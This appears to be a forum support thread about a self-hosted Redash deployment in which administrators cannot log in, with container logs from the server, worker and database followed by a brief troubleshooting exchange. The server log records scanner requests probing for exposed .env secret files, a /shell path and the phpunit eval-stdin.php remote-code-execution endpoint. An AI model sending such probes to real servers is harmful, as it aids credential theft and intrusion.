server_1            | [2021-12-14 18:13:13,036][PID:11][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=291 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-14 18:28:22,578][PID:12][INFO][metrics] method=GET path=/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=297 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-14 18:28:23,061][PID:12][INFO][metrics] method=POST path=/ endpoint=unknown status=405 content_type=text/html content_length=178 duration=1.29 query_count=0 query_duration=0.00
server_1            | [2021-12-14 18:28:44,611][PID:15][INFO][metrics] method=GET path=/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=297 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-14 18:28:45,080][PID:15][INFO][metrics] method=POST path=/ endpoint=unknown status=405 content_type=text/html content_length=178 duration=0.38 query_count=0 query_duration=0.00
server_1            | [2021-12-14 18:34:09,335][PID:15][INFO][metrics] method=GET path=/portal/redlion endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=321 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-14 18:38:44,391][PID:10][INFO][metrics] method=GET path=/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=297 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-14 18:38:44,851][PID:10][INFO][metrics] method=GET path=/login endpoint=redash_login status=200 content_type=text/html; charset=utf-8 content_length=1827 duration=226.29 query_count=1 query_duration=3.22
server_1            | [2021-12-14 19:08:06,992][PID:10][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-14 19:08:07,240][PID:11][INFO][metrics] method=GET path=/login endpoint=redash_login status=200 content_type=text/html; charset=utf-8 content_length=1827 duration=4.29 query_count=1 query_duration=1.19
server_1            | [2021-12-14 19:08:31,649][PID:15][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=299 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-14 19:08:32,105][PID:15][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.76 query_count=0 query_duration=0.00
server_1            | [2021-12-14 19:08:32,790][PID:15][INFO][metrics] method=GET path=/login endpoint=redash_login status=200 content_type=text/html; charset=utf-8 content_length=1827 duration=231.28 query_count=1 query_duration=3.33
server_1            | [2021-12-14 19:13:38,814][PID:10][INFO][metrics] method=GET path=/shell endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=611 duration=0.65 query_count=0 query_duration=0.00
server_1            | [2021-12-14 19:28:10,452][PID:10][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=291 duration=0.63 query_count=0 query_duration=0.00
server_1            | [2021-12-14 20:13:17,193][PID:12][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=291 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-14 20:13:32,771][PID:12][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=291 duration=0.57 query_count=0 query_duration=0.00
server_1            | [2021-12-14 20:41:12,197][PID:11][INFO][metrics] method=GET path=/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=297 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-14 20:41:12,672][PID:11][INFO][metrics] method=POST path=/ endpoint=unknown status=405 content_type=text/html content_length=178 duration=1.34 query_count=0 query_duration=0.00
server_1            | [2021-12-14 21:22:31,447][PID:15][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.60 query_count=0 query_duration=0.00
server_1            | [2021-12-14 21:24:19,482][PID:15][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=299 duration=0.57 query_count=0 query_duration=0.00
server_1            | [2021-12-14 22:04:17,531][PID:11][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=291 duration=0.55 query_count=0 query_duration=0.00
server_1            | [2021-12-14 22:07:56,011][PID:15][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-14 22:07:56,457][PID:15][INFO][metrics] method=GET path=/login endpoint=redash_login status=200 content_type=text/html; charset=utf-8 content_length=1827 duration=4.33 query_count=1 query_duration=1.23
server_1            | [2021-12-14 22:11:43,258][PID:15][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=291 duration=0.57 query_count=0 query_duration=0.00
server_1            | [2021-12-14 22:38:54,818][PID:12][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-14 22:38:58,300][PID:11][INFO][metrics] method=GET path=/login endpoint=redash_login status=200 content_type=text/html; charset=utf-8 content_length=1827 duration=4.44 query_count=1 query_duration=1.13
server_1            | [2021-12-14 22:39:00,443][PID:11][INFO][metrics] method=GET path=/favicon.ico endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=321 duration=0.61 query_count=0 query_duration=0.00
server_1            | [2021-12-14 22:39:01,666][PID:10][INFO][metrics] method=GET path=/login endpoint=redash_login status=200 content_type=text/html; charset=utf-8 content_length=1827 duration=4.17 query_count=1 query_duration=1.17
server_1            | [2021-12-15 00:08:48,279][PID:12][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-15 00:08:48,295][PID:12][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-15 00:54:45,056][PID:10][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=289 duration=0.62 query_count=0 query_duration=0.00
server_1            | [2021-12-15 01:49:45,736][PID:11][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=299 duration=0.62 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:36,406][PID:10][INFO][metrics] method=GET path=/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=297 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:38,093][PID:12][INFO][metrics] method=GET path=/conf/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=311 duration=0.88 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:39,894][PID:12][INFO][metrics] method=GET path=/wp-content/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=323 duration=0.70 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:41,395][PID:11][INFO][metrics] method=GET path=/wp-admin/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=319 duration=0.61 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:43,138][PID:11][INFO][metrics] method=GET path=/library/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=317 duration=0.57 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:44,616][PID:11][INFO][metrics] method=GET path=/new/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=309 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:46,276][PID:11][INFO][metrics] method=GET path=/vendor/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=315 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:47,031][PID:11][INFO][metrics] method=GET path=/old/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=309 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:48,552][PID:15][INFO][metrics] method=GET path=/local/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=313 duration=0.61 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:50,079][PID:10][INFO][metrics] method=GET path=/api/.env endpoint=redash_index status=404 content_type=application/json content_length=-1 duration=0.28 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:51,420][PID:15][INFO][metrics] method=GET path=/blog/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=311 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:53,085][PID:10][INFO][metrics] method=GET path=/crm/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=309 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:54,620][PID:10][INFO][metrics] method=GET path=/admin/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=313 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:56,219][PID:10][INFO][metrics] method=GET path=/laravel/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=317 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:57,386][PID:10][INFO][metrics] method=GET path=/app/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=309 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:29:58,932][PID:10][INFO][metrics] method=GET path=/app/config/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=327 duration=0.57 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:00,494][PID:12][INFO][metrics] method=GET path=/apps/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=311 duration=0.71 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:02,133][PID:12][INFO][metrics] method=GET path=/audio/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=313 duration=0.55 query_count=0 query_duration=0.00
redis_1             | 1:M 15 Dec 2021 03:51:24.535 * Background saving terminated with success
server_1            | [2021-12-15 02:30:03,591][PID:15][INFO][metrics] method=GET path=/cgi-bin/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=317 duration=0.57 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:05,144][PID:15][INFO][metrics] method=GET path=/backend/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=317 duration=0.59 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:06,630][PID:15][INFO][metrics] method=GET path=/src/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=309 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:08,187][PID:15][INFO][metrics] method=GET path=/base/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=311 duration=0.79 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:09,533][PID:11][INFO][metrics] method=GET path=/core/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=311 duration=0.55 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:10,888][PID:11][INFO][metrics] method=GET path=/vendor/laravel/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=335 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:11,254][PID:11][INFO][metrics] method=GET path=/storage/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=317 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:11,854][PID:12][INFO][metrics] method=GET path=/protected/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=321 duration=0.57 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:13,346][PID:12][INFO][metrics] method=GET path=/newsite/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=317 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:14,967][PID:12][INFO][metrics] method=GET path=/www/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=309 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:16,353][PID:12][INFO][metrics] method=GET path=/sites/all/libraries/mailchimp/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=373 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:17,940][PID:12][INFO][metrics] method=GET path=/database/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=319 duration=0.61 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:19,295][PID:12][INFO][metrics] method=GET path=/public/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=315 duration=0.56 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:19,896][PID:12][INFO][metrics] method=GET path=/ec2-52-220-228-35.ap-southeast-1.compute.amazonaws.com/.env endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=411 duration=0.58 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:21,363][PID:12][INFO][metrics] method=POST path=/ endpoint=unknown status=405 content_type=text/html content_length=178 duration=0.38 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:30:22,559][PID:12][INFO][metrics] method=GET path=/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=413 duration=0.59 query_count=0 query_duration=0.00
server_1            | [2021-12-15 02:36:48,852][PID:12][INFO][metrics] method=GET path=/shell endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=607 duration=0.65 query_count=0 query_duration=0.00
server_1            | [2021-12-15 03:14:06,993][PID:10][INFO][metrics] method=GET path=/ endpoint=redash_index status=302 content_type=text/html; charset=utf-8 content_length=299 duration=0.58 query_count=0 query_duration=0.00

scheduled_worker_1  | 
scheduled_worker_1  | [tasks]
scheduled_worker_1  |   . redash.tasks.check_alerts_for_query
scheduled_worker_1  |   . redash.tasks.cleanup_query_results
scheduled_worker_1  |   . redash.tasks.empty_schedules
scheduled_worker_1  |   . redash.tasks.execute_query
scheduled_worker_1  |   . redash.tasks.record_event
scheduled_worker_1  |   . redash.tasks.refresh_queries
scheduled_worker_1  |   . redash.tasks.refresh_schema
scheduled_worker_1  |   . redash.tasks.refresh_schemas
scheduled_worker_1  |   . redash.tasks.send_aggregated_errors
scheduled_worker_1  |   . redash.tasks.send_mail
scheduled_worker_1  |   . redash.tasks.subscribe
scheduled_worker_1  |   . redash.tasks.sync_user_details
scheduled_worker_1  |   . redash.tasks.version_check
scheduled_worker_1  | 
scheduled_worker_1  | [2021-12-14 09:50:26,727][PID:1][INFO][MainProcess] Connected to redis://redis:6379/0
scheduled_worker_1  | [2021-12-14 09:50:26,784][PID:1][INFO][MainProcess] mingle: searching for neighbors
scheduled_worker_1  | [2021-12-14 09:50:27,890][PID:1][INFO][MainProcess] mingle: all alone
scheduled_worker_1  | [2021-12-14 09:50:27,965][PID:1][INFO][MainProcess] celery@d72e127ab4ad ready.
scheduled_worker_1  | 
scheduled_worker_1  | worker: Warm shutdown (MainProcess)
scheduled_worker_1  | Starting 1 workers for queues: scheduled_queries,schemas...
scheduled_worker_1  |  
scheduled_worker_1  |  -------------- celery@d72e127ab4ad v4.3.0 (rhubarb)
scheduled_worker_1  | ---- **** ----- 
scheduled_worker_1  | --- * ***  * -- Linux-5.4.0-1059-aws-x86_64-with-debian-10.0 2021-12-14 13:23:52
scheduled_worker_1  | -- * - **** --- 
scheduled_worker_1  | - ** ---------- [config]
scheduled_worker_1  | - ** ---------- .> app:         redash:0x7f1e1973aa90
scheduled_worker_1  | - ** ---------- .> transport:   redis://redis:6379/0
scheduled_worker_1  | - ** ---------- .> results:     redis://redis:6379/0
scheduled_worker_1  | - *** --- * --- .> concurrency: 1 (prefork)
scheduled_worker_1  | -- ******* ---- .> task events: OFF (enable -E to monitor tasks in this worker)
scheduled_worker_1  | --- ***** ----- 
scheduled_worker_1  |  -------------- [queues]
scheduled_worker_1  |                 .> scheduled_queries exchange=scheduled_queries(direct) key=scheduled_queries
scheduled_worker_1  |                 .> schemas          exchange=schemas(direct) key=schemas
scheduled_worker_1  | 
scheduled_worker_1  | [tasks]
scheduled_worker_1  |   . redash.tasks.check_alerts_for_query
scheduled_worker_1  |   . redash.tasks.cleanup_query_results
scheduled_worker_1  |   . redash.tasks.empty_schedules
scheduled_worker_1  |   . redash.tasks.execute_query
scheduled_worker_1  |   . redash.tasks.record_event
scheduled_worker_1  |   . redash.tasks.refresh_queries
scheduled_worker_1  |   . redash.tasks.refresh_schema
scheduled_worker_1  |   . redash.tasks.refresh_schemas
scheduled_worker_1  |   . redash.tasks.send_aggregated_errors
scheduled_worker_1  |   . redash.tasks.send_mail
scheduled_worker_1  |   . redash.tasks.subscribe
scheduled_worker_1  |   . redash.tasks.sync_user_details
scheduled_worker_1  |   . redash.tasks.version_check
scheduled_worker_1  | 
scheduled_worker_1  | [2021-12-14 13:23:53,396][PID:1][INFO][MainProcess] Connected to redis://redis:6379/0
scheduled_worker_1  | [2021-12-14 13:23:53,456][PID:1][INFO][MainProcess] mingle: searching for neighbors
scheduled_worker_1  | [2021-12-14 13:23:54,565][PID:1][INFO][MainProcess] mingle: all alone
scheduled_worker_1  | [2021-12-14 13:23:54,627][PID:1][INFO][MainProcess] celery@d72e127ab4ad ready.
scheduled_worker_1  | [2021-12-14 13:23:54,996][PID:1][INFO][MainProcess] sync with celery@1168bb839579
scheduled_worker_1  | [2021-12-14 13:23:55,191][PID:1][INFO][MainProcess] sync with celery@4a09e1d19ec1
scheduled_worker_1  | 
scheduled_worker_1  | worker: Warm shutdown (MainProcess)
scheduled_worker_1  | Starting 1 workers for queues: scheduled_queries,schemas...
scheduled_worker_1  |  
scheduled_worker_1  |  -------------- celery@d72e127ab4ad v4.3.0 (rhubarb)
scheduled_worker_1  | ---- **** ----- 
scheduled_worker_1  | --- * ***  * -- Linux-5.4.0-1059-aws-x86_64-with-debian-10.0 2021-12-14 14:38:11
scheduled_worker_1  | -- * - **** --- 
scheduled_worker_1  | - ** ---------- [config]
scheduled_worker_1  | - ** ---------- .> app:         redash:0x7ff3c970ea90
scheduled_worker_1  | - ** ---------- .> transport:   redis://redis:6379/0
scheduled_worker_1  | - ** ---------- .> results:     redis://redis:6379/0
scheduled_worker_1  | - *** --- * --- .> concurrency: 1 (prefork)
scheduled_worker_1  | -- ******* ---- .> task events: OFF (enable -E to monitor tasks in this worker)
scheduled_worker_1  | --- ***** ----- 
scheduled_worker_1  |  -------------- [queues]
scheduled_worker_1  |                 .> scheduled_queries exchange=scheduled_queries(direct) key=scheduled_queries
scheduled_worker_1  |                 .> schemas          exchange=schemas(direct) key=schemas
scheduled_worker_1  | 
scheduled_worker_1  | [tasks]
scheduled_worker_1  |   . redash.tasks.check_alerts_for_query
scheduled_worker_1  |   . redash.tasks.cleanup_query_results
scheduled_worker_1  |   . redash.tasks.empty_schedules
scheduled_worker_1  |   . redash.tasks.execute_query
scheduled_worker_1  |   . redash.tasks.record_event
scheduled_worker_1  |   . redash.tasks.refresh_queries
scheduled_worker_1  |   . redash.tasks.refresh_schema
scheduled_worker_1  |   . redash.tasks.refresh_schemas
scheduled_worker_1  |   . redash.tasks.send_aggregated_errors
scheduled_worker_1  |   . redash.tasks.send_mail
scheduled_worker_1  |   . redash.tasks.subscribe
scheduled_worker_1  |   . redash.tasks.sync_user_details
scheduled_worker_1  |   . redash.tasks.version_check
scheduled_worker_1  | 
scheduled_worker_1  | [2021-12-14 14:38:11,916][PID:1][INFO][MainProcess] Connected to redis://redis:6379/0
scheduled_worker_1  | [2021-12-14 14:38:11,979][PID:1][INFO][MainProcess] mingle: searching for neighbors
scheduled_worker_1  | [2021-12-14 14:38:13,112][PID:1][INFO][MainProcess] mingle: all alone
scheduled_worker_1  | [2021-12-14 14:38:13,192][PID:1][INFO][MainProcess] celery@d72e127ab4ad ready.
scheduled_worker_1  | [2021-12-14 14:38:13,244][PID:1][INFO][MainProcess] sync with celery@4a09e1d19ec1
scheduled_worker_1  | [2021-12-14 14:38:13,436][PID:1][INFO][MainProcess] sync with celery@1168bb839579
postgres_1          | LOG:  autovacuum launcher shutting down
postgres_1          | 
postgres_1          | PostgreSQL Database directory appears to contain a database; Skipping initialization
postgres_1          | 
postgres_1          | LOG:  database system was interrupted; last known up at 2021-12-14 07:41:53 UTC
postgres_1          | LOG:  database system was not properly shut down; automatic recovery in progress
postgres_1          | LOG:  invalid record length at 0/1694DE98: wanted 24, got 0
postgres_1          | LOG:  redo is not required
postgres_1          | LOG:  MultiXact member wraparound protections are now enabled
postgres_1          | LOG:  autovacuum launcher started
postgres_1          | LOG:  database system is ready to accept connections
postgres_1          | LOG:  received fast shutdown request
postgres_1          | LOG:  aborting any active transactions
postgres_1          | LOG:  autovacuum launcher shutting down
postgres_1          | FATAL:  terminating connection due to administrator command
postgres_1          | FATAL:  terminating connection due to administrator command
postgres_1          | FATAL:  terminating connection due to administrator command
postgres_1          | FATAL:  terminating connection due to administrator command
postgres_1          | 
postgres_1          | PostgreSQL Database directory appears to contain a database; Skipping initialization
postgres_1          | 
postgres_1          | LOG:  database system was interrupted; last known up at 2021-12-14 08:01:12 UTC
postgres_1          | LOG:  database system was not properly shut down; automatic recovery in progress
postgres_1          | LOG:  invalid record length at 0/1694EE90: wanted 24, got 0
postgres_1          | LOG:  redo is not required
postgres_1          | LOG:  MultiXact member wraparound protections are now enabled
postgres_1          | LOG:  autovacuum launcher started
postgres_1          | LOG:  database system is ready to accept connections
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_0.tmp" to "pg_stat_tmp/db_0.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_12404.tmp" to "pg_stat_tmp/db_12404.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_12404.tmp" to "pg_stat_tmp/db_12404.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  received fast shutdown request
postgres_1          | LOG:  aborting any active transactions
postgres_1          | LOG:  autovacuum launcher shutting down
postgres_1          | FATAL:  terminating connection due to administrator command
postgres_1          | FATAL:  terminating connection due to administrator command
postgres_1          | FATAL:  terminating connection due to administrator command
postgres_1          | FATAL:  terminating connection due to administrator command
postgres_1          | 
postgres_1          | PostgreSQL Database directory appears to contain a database; Skipping initialization
postgres_1          | 
postgres_1          | LOG:  database system was interrupted; last known up at 2021-12-14 09:55:17 UTC
postgres_1          | LOG:  database system was not properly shut down; automatic recovery in progress
postgres_1          | LOG:  invalid record length at 0/1694FE70: wanted 24, got 0
postgres_1          | LOG:  redo is not required
postgres_1          | LOG:  MultiXact member wraparound protections are now enabled
postgres_1          | LOG:  database system is ready to accept connections
postgres_1          | LOG:  autovacuum launcher started
postgres_1          | LOG:  received fast shutdown request
postgres_1          | LOG:  aborting any active transactions
postgres_1          | LOG:  autovacuum launcher shutting down
postgres_1          | FATAL:  terminating connection due to administrator command
postgres_1          | FATAL:  terminating connection due to administrator command
postgres_1          | 
postgres_1          | PostgreSQL Database directory appears to contain a database; Skipping initialization
postgres_1          | 
postgres_1          | LOG:  database system was interrupted; last known up at 2021-12-14 13:28:44 UTC
postgres_1          | LOG:  database system was not properly shut down; automatic recovery in progress
postgres_1          | LOG:  invalid record length at 0/16950E30: wanted 24, got 0
postgres_1          | LOG:  redo is not required
postgres_1          | LOG:  MultiXact member wraparound protections are now enabled
postgres_1          | LOG:  autovacuum launcher started
postgres_1          | LOG:  database system is ready to accept connections
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_0.tmp" to "pg_stat_tmp/db_0.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_12404.tmp" to "pg_stat_tmp/db_12404.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_0.tmp" to "pg_stat_tmp/db_0.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_12404.tmp" to "pg_stat_tmp/db_12404.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_0.tmp" to "pg_stat_tmp/db_0.stat": No such file or directory
postgres_1          | WARNING:  corrupted statistics file "pg_stat_tmp/db_0.stat"
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_12404.tmp" to "pg_stat_tmp/db_12404.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_0.tmp" to "pg_stat_tmp/db_0.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_0.tmp" to "pg_stat_tmp/db_0.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_0.tmp" to "pg_stat_tmp/db_0.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_0.tmp" to "pg_stat_tmp/db_0.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_12404.tmp" to "pg_stat_tmp/db_12404.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_0.tmp" to "pg_stat_tmp/db_0.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_12404.tmp" to "pg_stat_tmp/db_12404.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/db_0.tmp" to "pg_stat_tmp/db_0.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory
postgres_1          | LOG:  could not rename temporary statistics file "pg_stat_tmp/global.tmp" to "pg_stat_tmp/global.stat": No such file or directory

I don’t see anything out of the ordinary in your logs. Please answer the following questions:

  1. Can any administrator log-in? If not, what is the error?
  2. When a user logs in are there any errors in the network inspector?

Getting wrong email or password when a admin try to login.
image

We can see following screen when non admin user login


Have you tried resetting the password for the admin user so that you can log-in?

Also, please share your logs from the server container immediately following that 500 error you see in the browser.

Sorry…
Unfortunately we didn’t configured email flow.

I can get a message as “Resett password email will send If email exist” when I try to reset the password.

Thanks!!